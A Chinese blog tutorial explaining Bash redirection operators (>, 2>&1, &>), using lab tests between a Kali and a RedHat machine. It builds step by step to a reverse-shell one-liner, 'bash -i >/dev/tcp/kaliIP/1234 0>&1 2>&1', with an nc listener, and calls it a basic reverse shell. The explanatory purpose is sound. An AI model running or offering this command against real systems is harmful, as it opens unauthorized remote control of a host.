linux bash -,linux bash >&总结

本文详细解析了Bash中的输入输出重定向操作,包括标准输出、标准错误等概念,并通过具体示例展示了如何使用>&等符号来实现不同场景下的重定向需求。

0x00 前言

经常接触到bash的>&符号,总是忘记或者混淆,特有此文总结。

0x01 概述

0:stdin标准输入

1:stdout标准输出

2:stderr标准错误

>:输出重定向

/dev/null:空洞,可以理解为黑洞或垃圾箱

直接ls > 1系统会误认为是把标准输出重定向到1这个文件而不是标准输出,所以加上&1表示标准输出。

标准错误2不仅显示错误信息,还有回显输入命令和终端提示符的作用。

>/dev/null 2>&1:把标准输出重定向到黑洞,接着标准错误重定向到标准输出,也就是扔到一样黑洞。

2>&1 >/dev/null:先把标准错误重定向到标准输出,注意这里标准输出还是默认输出到屏幕,所以会输出stderr,接着标准输出重定向到黑洞,所以输出stderr不输出stdout。

0x02 测试

测试0:

redhat:cat hi.txt >/dev/null

abcd >/dev/null 2>&1

3f492ebf6dc366dbec8bba7254063098.png

测试1:

kali: nc -vvlp 1234

redhat:bash -i >/dev/tcp/kaliIP/1234

bd5464ccce7594fed089884de9d279a7.png

5fe0cc5e3cbe4080f59f039a4938d630.png

解释:bash -i创建的交互式子shell的标准输出给了/dev/tcp/kaliIP/1234,所以在redhat中输入ls命令的输出结果在kali中显示,但是标准错误2还是在redhat中,所以输入abcd这个不存在的命令时标准错误显示在redhat中。

测试2:

kali:nc -vvlp 1234

redhat:bash -i 

0c043ec6c928c97f26bdc52e23a8ab73.png

ed9622ff38ef7470750f1bf6df52d142.png

解释:redhat从/dev/tcp/kaliIP/1234中获得标准输入0,将ls命令的结果显示出来。由于标准错误2还在redhat,所以在kali中输入abcd这个不存在的命令时,错误信息显示在redhat,注意这里命令虽然在kali中输入,但是命令也会回显到redhat,因为标准错误2还在redhat……貌似强调得有点多了^-^!。

测试3:

kali:nc -vvlp 1234

redhat:bash -i >/dev/tcp/kaliIP/1234 0>&1

c1489f1e9391f71d38e8761aca09b770.png

0b6ed69b0aba398988922ae35853dd42.png

解释:在redhat中将标准输出1重定向到kali,标准输入0重定向到标准输出1,也就是在kali中输入命令ls,命令传到redhat的子shell,再将命令结果输出到kali,注意这里标准错误2在redhat,所以redhat有命令回显和标准错误(如图的abcd)。

测试4:

kali:nc -vvlp 1234

redhat:bash -i >/dev/tcp/kaliIP/1234 0>&1 2>&1

04487691b9513f0b5159abf7dc2a199d.png

b751d096fbd43b4d2904acac46ba0508.png

解释:redhat中在测试3的基础上将标准错误也重定向到标准输出,这样在redhat中就没有了标准错误信息和命令回显(包括命令提示符),这就是一个基本的反弹shell了。

通过查阅资料https://www.gnu.org/software/bash/manual/bash.pdf

可以发现

There are two formats for redirecting standard output and standard error:

&>

word

and

>&

word

Of the two forms, the first is preferred. This is semantically equivalent to

>

word

2>&1

也就是说2>&1和>&/dev/…,&>/dev/…是一样的,亲测有效。

0x03 结语

多看看官方手册还是不错的。

0x04 参考资料

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值